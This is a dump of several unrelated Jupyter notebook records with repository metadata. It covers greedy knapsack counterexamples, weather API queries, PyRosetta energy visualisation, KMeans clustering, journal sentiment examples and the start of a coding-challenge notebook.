"# TQ3: Knapsack\nIn this theoretical question we have to face with a NP-complete problem: the Knapsack one. To solve it generally we have to use heuristic solutions but in some cases they fail to provide the optimal solution.\n* The first heuristic solution is a greedy algorithm in which we order the object in increasing order of weight and then visit them sequentially, adding them to the solution as long as the budget is not exceeded. This algorithm does not provide the optimal solution in every situation indeed in my counterexample this greedy algorithm fails: we fix the budget: **W** = 10 and we have three object.\n\n\n|i |w_i| v_i|\n|-----|---|----|\n|1 |4 |3 |\n|2 |6 |5 |\n|3 |10 |9 |\n\nWe have to visit the object sequentially so we are going to pick the first two objects, but we cannot pick the third one because we will exceed the budget. This choice is not optimal because it would be better pick only the third object because its values (9) is greater of the sum of the first two (8).\n\n* In the second heuristic solution we have to order the objects in decreasing order of values, and then visit them sequentially, adding them to the solution if the budget is not exceeded. This algorithm does not provide the optimal solution in each situation indeed in my counterexample this greedy algorithm fails: I have decided to choose the same budget **W** = 10 and the same number of object of the last counterexample.\n\n|i |w_i| v_i|\n|-----|---|----|\n|1 |9 |9 |\n|2 |7 |7 |\n|3 |3 |3 |\n\nWe have to visit the objects sequentially so we are going to pick the first object, but we cannot pick the last two because we will exceed the budget. This choice is not optimal because it would be better pick the second and the third objects because the sum of their values (10) is greater of the first object value (9).\n\n* In the third heuristic solution we have to order them in decreasing relative value ($v_1$/ $w_i$), and then visit them sequentially, adding them to the solution if the budget is not exceeded\nThis algorithm does not provide the optimal solution in each situation indeed in my counterexample this greedy algorithm fails: I have decided to choose the same budget **W** = 10 and the same number of object of the two last counterexamples.\n\n|i |w_i| v_i|\n|-----|---|----|\n|1 |7 |9 |\n|2 |6 |6 |\n|3 |4 |4 |\n\nWe have to visit the objects sequentially so we are going to pick the first object whose relative value is 1.29 while the one of the other objects is 1. We cannot pick the last two because we will exceed the budget. This choice is not optimal because it would be better pick the second and the third objects because the sum of their values (10) is greater of the first object value (9).",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb510e61d95e97a82261a5befdb484bf0c11f287 | 79,924 | ipynb | Jupyter Notebook | explore_data_gov_sg_api.ipynb | grandey/access-data-gov-sg | 5acfaf495757ac25e82b731d448e21ad9639749d | [
"Unlicense",
"MIT"
] | 3 | 2018-04-18T12:07:02.000Z | 2020-01-04T11:00:33.000Z | explore_data_gov_sg_api.ipynb | grandey/access-data-gov-sg | 5acfaf495757ac25e82b731d448e21ad9639749d | [
"Unlicense",
"MIT"
] | null | null | null | explore_data_gov_sg_api.ipynb | grandey/access-data-gov-sg | 5acfaf495757ac25e82b731d448e21ad9639749d | [
"Unlicense",
"MIT"
] | 3 | 2017-07-12T02:59:06.000Z | 2021-09-29T06:59:24.000Z | 40.50887 | 16,296 | 0.474701 | [
[
[
"# explore_data_gov_sg_api\n\n## Purpose:\nExplore the weather-related APIs at https://developers.data.gov.sg.\n\n## History:\n- 2017-05 - Benjamin S. Grandey\n- 2017-05-29 - Moving from atmos-scripts repository to access-data-gov-sg repository, and renaming from data_gov_sg_explore.ipynb to explore_data_gov_sg_api.ipynb.",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nimport pandas as pd\nimport requests\nimport seaborn as sns\n\n%matplotlib inline",
"_____no_output_____"
],
[
"# Get my API keys\nfrom my_api_keys import my_api_dict\n# Note: this module, containing my API keys, will not be shared via GitHub\n# You can obtain your own API key(s) by registering at https://developers.data.gov.sg\nmy_key = my_api_dict['data.gov.sg'] # API key for data.gov.sg",
"_____no_output_____"
]
],
[
[
"## Meta-data for available meteorological APIs\n[I added this section after exploring the wind-speed data - see below.]",
"_____no_output_____"
]
],
[
[
"# Meteorological variables\nfor variable in ['rainfall', 'wind-speed', 'wind-direction', 'air-temperature', 'relative-humidity']:\n print(variable)\n r = requests.get('https://api.data.gov.sg/v1/environment/{}'.format(variable),\n headers={'api-key': my_key})\n metadata = r.json()['metadata']\n for key in metadata.keys():\n if key != 'stations': # don't print information about stations\n print(' {}: {}'.format(key, r.json()['metadata'][key]))",
"rainfall\n reading_type: TB1 Rainfall 5 Minute Total F\n reading_unit: mm\nwind-speed\n reading_type: Wind Speed AVG(S)10M M1M\n reading_unit: knots\nwind-direction\n reading_type: Wind Dir AVG (S) 10M M1M\n reading_unit: degrees\nair-temperature\n reading_type: DBT 1M F\n reading_unit: deg C\nrelative-humidity\n reading_type: RH 1M F\n reading_unit: percentage\n"
],
[
"# 1hr PM2.5 data are also available\nr = requests.get('https://api.data.gov.sg/v1/environment/{}'.format('pm25'),\n headers={'api-key': my_key})\nr.json()",
"_____no_output_____"
]
],
[
[
"## Wind-speed",
"_____no_output_____"
]
],
[
[
"# Query without specifying date_time - returns most recent data?\n!date\nr = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',\n headers={'api-key': my_key})\nr.json()",
"Mon May 29 12:35:07 +08 2017\r\n"
],
[
"# Re-organize data into DataFrame\ndf = pd.DataFrame(r.json()['items'][0]['readings'])\ndf = df.rename(columns={'value': 'wind-speed'})\ndf['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])\ndf",
"_____no_output_____"
],
[
"# Get wind-speed for specific time in past\nr = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',\n headers={'api-key': my_key},\n params={'date_time': '2016-12-10T00:00:00'})\ndf = pd.DataFrame(r.json()['items'][0]['readings'])\ndf = df.rename(columns={'value': 'wind-speed'})\ndf['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])\ndf",
"_____no_output_____"
],
[
"# Get wind-speed at 5-min intervals on a specific date\n# Note: if 'date' is used instead of 'date_time', the API appears to timeout\nwind_speed_df = pd.DataFrame(columns=['station_id', 'wind-speed', 'timestamp (SGT)'])\nfor dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'):\n r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',\n headers={'api-key': my_key},\n params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})\n temp_df = pd.DataFrame(r.json()['items'][0]['readings'])\n temp_df = temp_df.rename(columns={'value': 'wind-speed'})\n temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])\n wind_speed_df = wind_speed_df.append(temp_df, ignore_index=True)\nwind_speed_df.head(15)",
"_____no_output_____"
],
[
"wind_speed_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 3660 entries, 0 to 3659\nData columns (total 3 columns):\nstation_id 3660 non-null object\nwind-speed 3660 non-null float64\ntimestamp (SGT) 3660 non-null datetime64[ns]\ndtypes: datetime64[ns](1), float64(1), object(1)\nmemory usage: 85.9+ KB\n"
],
[
"wind_speed_df.groupby('station_id').describe()",
"_____no_output_____"
]
],
[
[
"## Rainfall",
"_____no_output_____"
]
],
[
[
"# Get rainfall at 5-min intervals on a specific date\nrainfall_df = pd.DataFrame(columns=['station_id', 'rainfall', 'timestamp (SGT)'])\nfor dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'): # I remember this was a wet day\n r = requests.get('https://api.data.gov.sg/v1/environment/rainfall',\n headers={'api-key': my_key},\n params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})\n temp_df = pd.DataFrame(r.json()['items'][0]['readings'])\n temp_df = temp_df.rename(columns={'value': 'rainfall'})\n temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])\n rainfall_df = rainfall_df.append(temp_df, ignore_index=True)\nrainfall_df.head(15)",
"_____no_output_____"
],
[
"rainfall_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 13196 entries, 0 to 13195\nData columns (total 3 columns):\nstation_id 13196 non-null object\nrainfall 13196 non-null object\ntimestamp (SGT) 13196 non-null datetime64[ns]\ndtypes: datetime64[ns](1), object(2)\nmemory usage: 309.4+ KB\n"
],
[
"rainfall_df['rainfall'] = rainfall_df['rainfall'].astype('float') # convert to float\nrainfall_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 13196 entries, 0 to 13195\nData columns (total 3 columns):\nstation_id 13196 non-null object\nrainfall 13196 non-null float64\ntimestamp (SGT) 13196 non-null datetime64[ns]\ndtypes: datetime64[ns](1), float64(1), object(1)\nmemory usage: 309.4+ KB\n"
]
],
[
[
"## Merge wind-speed and rainfall DataFrames",
"_____no_output_____"
]
],
[
[
"# Union of wind-speed and rainfall data\nouter_df = pd.merge(wind_speed_df, rainfall_df, how='outer', on=['station_id', 'timestamp (SGT)'])\nouter_df.head(15)",
"_____no_output_____"
],
[
"outer_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 13535 entries, 0 to 13534\nData columns (total 4 columns):\nstation_id 13535 non-null object\nwind-speed 3660 non-null float64\ntimestamp (SGT) 13535 non-null datetime64[ns]\nrainfall 13196 non-null float64\ndtypes: datetime64[ns](1), float64(2), object(1)\nmemory usage: 528.7+ KB\n"
],
[
"# Intersection of wind-speed and rainfall data\ninner_df = pd.merge(wind_speed_df, rainfall_df, how='inner', on=['station_id', 'timestamp (SGT)'])\ninner_df.head(15)",
"_____no_output_____"
],
[
"inner_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 3321 entries, 0 to 3320\nData columns (total 4 columns):\nstation_id 3321 non-null object\nwind-speed 3321 non-null float64\ntimestamp (SGT) 3321 non-null datetime64[ns]\nrainfall 3321 non-null float64\ndtypes: datetime64[ns](1), float64(2), object(1)\nmemory usage: 129.7+ KB\n"
],
[
"inner_df.groupby('station_id').describe()",
"_____no_output_____"
],
[
"# Quick look at relationship between rainfall and wind-speed for one station and one day\n# Information about station S50\nr = requests.get('https://api.data.gov.sg/v1/environment/rainfall',\n headers={'api-key': my_key},\n params={'date_time': '2017-05-04T00:00:00'})\nfor d in r.json()['metadata']['stations']:\n if d['device_id'] == 'S50':\n print(d)\n# Select data for station S50\ns50_df = inner_df.loc[inner_df['station_id'] == 'S50']\n# Plot\nsns.jointplot(s50_df['rainfall'], s50_df['wind-speed'], kind='scatter')",
"{'id': 'S50', 'device_id': 'S50', 'name': 'Clementi Road', 'location': {'latitude': 1.3337, 'longitude': 103.7768}}\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb51112128c60c1dcc2bb6fc5b2cb75156910c66 | 11,338 | ipynb | Jupyter Notebook | student-notebooks/03.03-Energies-and-the-PyMOLMover.ipynb | So-AI-love/PyRosetta.notebooks | bd1adf0bcd300db4576b1418defc7bea71dc28cc | [
"MIT"
] | 1 | 2020-12-11T15:20:41.000Z | 2020-12-11T15:20:41.000Z | student-notebooks/03.03-Energies-and-the-PyMOLMover.ipynb | Paradoxia-crypo/PyRosetta.notebooks | 200a6d5489f2108999563ae38c7e3fcdabe8f5fe | [
"MIT"
] | null | null | null | student-notebooks/03.03-Energies-and-the-PyMOLMover.ipynb | Paradoxia-crypo/PyRosetta.notebooks | 200a6d5489f2108999563ae38c7e3fcdabe8f5fe | [
"MIT"
] | null | null | null | 27.124402 | 700 | 0.595343 | [
[
[
"Before you turn this problem in, make sure everything runs as expected. First, **restart the kernel** (in the menubar, select Kernel$\\rightarrow$Restart) and then **run all cells** (in the menubar, select Cell$\\rightarrow$Run All).\n\nMake sure you fill in any place that says `YOUR CODE HERE` or \"YOUR ANSWER HERE\", as well as your name and collaborators below:",
"_____no_output_____"
]
],
[
[
"NAME = \"\"\nCOLLABORATORS = \"\"",
"_____no_output_____"
]
],
[
[
"---",
"_____no_output_____"
],
[
"<!--NOTEBOOK_HEADER-->\n*This notebook contains material from [PyRosetta](https://RosettaCommons.github.io/PyRosetta.notebooks);\ncontent is available [on Github](https://github.com/RosettaCommons/PyRosetta.notebooks.git).*",
"_____no_output_____"
],
[
"<!--NAVIGATION-->\n< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href=\"https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb\"><img align=\"left\" src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open in Colab\" title=\"Open in Google Colaboratory\"></a>",
"_____no_output_____"
],
[
"# Energies and the PyMOL Mover\nKeywords: send_energy(), label_energy(), send_hbonds()",
"_____no_output_____"
]
],
[
[
"# Notebook setup\nimport sys\nif 'google.colab' in sys.modules:\n !pip install pyrosettacolabsetup\n import pyrosettacolabsetup\n pyrosettacolabsetup.setup()\n print (\"Notebook is set for PyRosetta use in Colab. Have fun!\")\n\nfrom pyrosetta import *\nfrom pyrosetta.teaching import *\ninit()",
"_____no_output_____"
]
],
[
[
"**Make sure you are in the directory with the pdb files:**\n\n`cd google_drive/My\\ Drive/student-notebooks/`",
"_____no_output_____"
]
],
[
[
"# From previous section:\nras = pyrosetta.pose_from_pdb(\"inputs/6Q21_A.pdb\")\nsfxn = get_fa_scorefxn()",
"_____no_output_____"
]
],
[
[
"The `PyMOLMover` class contains a method for sending score function information to PyMOL,\nwhich will then color the structure based on relative residue energies.\n\nOpen up PyMOL. Instantiate a `PyMOLMover` object and use the `pymol_mover.send_energy(ras)` to send the coloring command to PyMOL.\n\n```\npymol_mover = PyMOLMover()\npymol_mover.apply(ras)\nprint(sfxn(ras))\npymol_mover.send_energy(ras)\n```",
"_____no_output_____"
]
],
[
[
"# YOUR CODE HERE\nraise NotImplementedError()",
"_____no_output_____"
],
[
"from IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = \"all\"\nfrom IPython import display",
"_____no_output_____"
],
[
"from pathlib import Path\ngifPath = Path(\"./Media/PyMOL-send_energy.gif\")\n# Display GIF in Jupyter, CoLab, IPython\nwith open(gifPath,'rb') as f:\n display.Image(data=f.read(), format='png',width='800')",
"_____no_output_____"
]
],
[
[
"What color is residue Proline34? What color is residue Alanine66? Which residue has lower energy?",
"_____no_output_____"
]
],
[
[
"# your response here",
"_____no_output_____"
]
],
[
[
"`pymol_mover.send_energy(ras, fa_atr)` will have PyMOL color only by the attractive van der Waals energy component. What color is residue 34 if colored by solvation energy, `fa_sol`?",
"_____no_output_____"
]
],
[
[
"# send specific energies to pymol",
"_____no_output_____"
],
[
"# YOUR CODE HERE\nraise NotImplementedError()",
"_____no_output_____"
]
],
[
[
"You can have PyMOL label each Cα with the value of its residue’s specified energy using:\n```\npymol_mover.label_energy(ras, \"fa_atr\")\n```",
"_____no_output_____"
]
],
[
[
"# YOUR CODE HERE\nraise NotImplementedError()",
"_____no_output_____"
]
],
[
[
"Finally, if you have scored the `pose` first, you can have PyMOL display all of the calculated hydrogen bonds for the structure:\n\n```\npymol_mover.send_hbonds(ras)\n```",
"_____no_output_____"
]
],
[
[
"# YOUR CODE HERE\nraise NotImplementedError()",
"_____no_output_____"
]
],
[
[
"## References\nThis Jupyter notebook is an adapted version of \"Workshop #3: Scoring\" in the PyRosetta workbook: https://graylab.jhu.edu/pyrosetta/downloads/documentation/pyrosetta4_online_format/PyRosetta4_Workshop3_Scoring.pdf",
"_____no_output_____"
],
[
"<!--NAVIGATION-->\n< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href=\"https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb\"><img align=\"left\" src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open in Colab\" title=\"Open in Google Colaboratory\"></a>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
cb511e28aa8f786baf4ed5cbf3fd0e707bc84087 | 83,935 | ipynb | Jupyter Notebook | Week 6/Comparison of the K-Means and MiniBatchKMeans clustering algorithms.ipynb | Hanif-2610/Machine-Learning-Homework-Project | 16257c4b06eeb66ef847352b20e7009ed3ffaaf8 | [
"Unlicense"
] | 1 | 2021-10-05T16:33:51.000Z | 2021-10-05T16:33:51.000Z | Week 6/Comparison of the K-Means and MiniBatchKMeans clustering algorithms.ipynb | Hanif-2610/Machine-Learning-Homework-Project | 16257c4b06eeb66ef847352b20e7009ed3ffaaf8 | [
"Unlicense"
] | null | null | null | Week 6/Comparison of the K-Means and MiniBatchKMeans clustering algorithms.ipynb | Hanif-2610/Machine-Learning-Homework-Project | 16257c4b06eeb66ef847352b20e7009ed3ffaaf8 | [
"Unlicense"
] | null | null | null | 83,935 | 83,935 | 0.946828 | [
[
[
"This model will cluster a set of data, first with KMeans and then with MiniBatchKMeans, and plot the results. It will also plot the points that are labelled differently between the two algorithms.",
"_____no_output_____"
]
],
[
[
"import time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.metrics.pairwise import pairwise_distances_argmin\nfrom sklearn.datasets import make_blobs",
"_____no_output_____"
],
[
"# Generate sample data\nnp.random.seed(0)\n\nbatch_size = 45\ncenters = [[1, 1], [-1, -1], [1, -1]]\nn_clusters = len(centers)\nX, labels_true = make_blobs(n_samples=3000, centers=centers, cluster_std=0.7)",
"_____no_output_____"
],
[
"# Compute clustering with Means\n\nk_means = KMeans(init=\"k-means++\", n_clusters=3, n_init=10)\nt0 = time.time()\nk_means.fit(X)\nt_batch = time.time() - t0",
"_____no_output_____"
],
[
"# Compute clustering with MiniBatchKMeans\n\nmbk = MiniBatchKMeans(\n init=\"k-means++\",\n n_clusters=3,\n batch_size=batch_size,\n n_init=10,\n max_no_improvement=10,\n verbose=0,\n)\nt0 = time.time()\nmbk.fit(X)\nt_mini_batch = time.time() - t0",
"_____no_output_____"
],
[
"# Plot result\n\nfig = plt.figure(figsize=(8, 3))\nfig.subplots_adjust(left=0.02, right=0.98, bottom=0.05, top=0.9)\ncolors = [\"#4EACC5\", \"#FF9C34\", \"#4E9A06\"]\n\n# We want to have the same colors for the same cluster from the\n# MiniBatchKMeans and the KMeans algorithm. Let's pair the cluster centers per\n# closest one.\nk_means_cluster_centers = k_means.cluster_centers_\norder = pairwise_distances_argmin(k_means.cluster_centers_, mbk.cluster_centers_)\nmbk_means_cluster_centers = mbk.cluster_centers_[order]\n\nk_means_labels = pairwise_distances_argmin(X, k_means_cluster_centers)\nmbk_means_labels = pairwise_distances_argmin(X, mbk_means_cluster_centers)\n\n# KMeans\nax = fig.add_subplot(1, 3, 1)\nfor k, col in zip(range(n_clusters), colors):\n my_members = k_means_labels == k\n cluster_center = k_means_cluster_centers[k]\n ax.plot(X[my_members, 0], X[my_members, 1], \"w\", markerfacecolor=col, marker=\".\")\n ax.plot(\n cluster_center[0],\n cluster_center[1],\n \"o\",\n markerfacecolor=col,\n markeredgecolor=\"k\",\n markersize=6,\n )\nax.set_title(\"KMeans\")\nax.set_xticks(())\nax.set_yticks(())\nplt.text(-3.5, 1.8, \"train time: %.2fs\\ninertia: %f\" % (t_batch, k_means.inertia_))\n\n# MiniBatchKMeans\nax = fig.add_subplot(1, 3, 2)\nfor k, col in zip(range(n_clusters), colors):\n my_members = mbk_means_labels == k\n cluster_center = mbk_means_cluster_centers[k]\n ax.plot(X[my_members, 0], X[my_members, 1], \"w\", markerfacecolor=col, marker=\".\")\n ax.plot(\n cluster_center[0],\n cluster_center[1],\n \"o\",\n markerfacecolor=col,\n markeredgecolor=\"k\",\n markersize=6,\n )\nax.set_title(\"MiniBatchKMeans\")\nax.set_xticks(())\nax.set_yticks(())\nplt.text(-3.5, 1.8, \"train time: %.2fs\\ninertia: %f\" % (t_mini_batch, mbk.inertia_))\n\n# Initialise the different array to all False\ndifferent = mbk_means_labels == 4\nax = fig.add_subplot(1, 3, 3)\n\nfor k in range(n_clusters):\n different += (k_means_labels == k) != (mbk_means_labels == k)\n\nidentic = np.logical_not(different)\nax.plot(X[identic, 0], X[identic, 1], \"w\", markerfacecolor=\"#bbbbbb\", marker=\".\")\nax.plot(X[different, 0], X[different, 1], \"w\", markerfacecolor=\"m\", marker=\".\")\nax.set_title(\"Difference\")\nax.set_xticks(())\nax.set_yticks(())\n\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb5121ae79d289de6099447a2cb718e22750e58b | 7,247 | ipynb | Jupyter Notebook | src/examples.ipynb | sarmentow/semasia | 42a5a7eff3e9f1988d2916becea2089ccd35bfb0 | [
"MIT"
] | null | null | null | src/examples.ipynb | sarmentow/semasia | 42a5a7eff3e9f1988d2916becea2089ccd35bfb0 | [
"MIT"
] | null | null | null | src/examples.ipynb | sarmentow/semasia | 42a5a7eff3e9f1988d2916becea2089ccd35bfb0 | [
"MIT"
] | null | null | null | 29.946281 | 761 | 0.596109 | [
[
[
"# These are some quick examples",
"_____no_output_____"
]
],
[
[
"import utils # utility functions that deal with documents\nimport model # everything that has to do with the actual abstractions that do the predictions and labeling\nimport main # abstractions for running predictions on a list of entries",
"_____no_output_____"
]
],
[
[
"Any util function that starts with entries takes a list of entries, some additional params and returns either a new list of data based on each entry or returns an object in specific cases. ",
"_____no_output_____"
],
[
"What you'll probably want to do first is load a list of entries from a directory into memory as an object. You can just call:",
"_____no_output_____"
]
],
[
[
"entries = utils.load_entries(\"./example_entries\")",
"_____no_output_____"
]
],
[
[
"In order to extract some informations, such the date and title, I hade to make some assumptions about how the file is formatted. The title is the first h1 header of the file and the date must be in the format:\n\n`Date: mmm, dd, yyyy`\n\nIf your files don't have an h1 title nor a date in the above format, it won't be loaded. If your entries are exported from Notion, they just need a date field and a title and then they should be compatible right away. \n\nThis is an example of how an entry object looks with a title, date and body field:",
"_____no_output_____"
]
],
[
[
"entries[0]",
"_____no_output_____"
]
],
[
[
"Here's the type of thing you can do with your list of entries:",
"_____no_output_____"
]
],
[
[
" # The amount of times a term appears throughout your entries\nutils.entries_frequency_query(entries, \"I\", exact=True)\n",
"_____no_output_____"
],
[
"\n# The mean word length throughout all entries\nutils.entries_mean_word_len(entries)",
"_____no_output_____"
],
[
"# A random sentence from an entry\nutils.entries_random_sentence(entries)",
"_____no_output_____"
]
],
[
[
"Most utility functions are self-explanatory, so what else can you do?",
"_____no_output_____"
]
],
[
[
"# Calculate emotions in a given entry\nmain.entry_generate_report(entries[2])",
"_____no_output_____"
]
],
[
[
"I think the interesting part is to combine these parts. You can use the utility functions to get the top 5 longest entries and then you can see what the emotions were on these. You could use the `utils.entries_replace_term_by` function in a list of entries and see how the predicted emotions change based on that.",
"_____no_output_____"
],
[
"You can also graph your emotions over time as you can see in the `examples.ipynb` notebook",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
cb51248481bc6af0e50b133d2e937ebc006dd6db | 1,483 | ipynb | Jupyter Notebook | docs/contents/tools/classes/parmed_Structure/to_openmm_Topology.ipynb | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | docs/contents/tools/classes/parmed_Structure/to_openmm_Topology.ipynb | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | docs/contents/tools/classes/parmed_Structure/to_openmm_Topology.ipynb | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | 19.773333 | 54 | 0.545516 | [
[
[
"# To openmm.Topology",
"_____no_output_____"
]
],
[
[
"from molsysmt.tools import parmed_Structure",
"_____no_output_____"
],
[
"#parmed_Structure.to_openmm_Topology(item)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
]
] |
cb5132641f3fb906112f4df38c91a265fa45cfb6 | 5,654 | ipynb | Jupyter Notebook | sorting_searching/new_int/new_int_solution.ipynb | lvwuyunlifan/interactive-coding-challenges | 3a8ebbb4b337e5f4350f8166e101b9bb84228b1b | [
"Apache-2.0"
] | null | null | null | sorting_searching/new_int/new_int_solution.ipynb | lvwuyunlifan/interactive-coding-challenges | 3a8ebbb4b337e5f4350f8166e101b9bb84228b1b | [
"Apache-2.0"
] | null | null | null | sorting_searching/new_int/new_int_solution.ipynb | lvwuyunlifan/interactive-coding-challenges | 3a8ebbb4b337e5f4350f8166e101b9bb84228b1b | [
"Apache-2.0"
] | null | null | null | 27.052632 | 286 | 0.510435 | [
[
[
"This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).",
"_____no_output_____"
],
[
"# Solution Notebook",
"_____no_output_____"
],
[
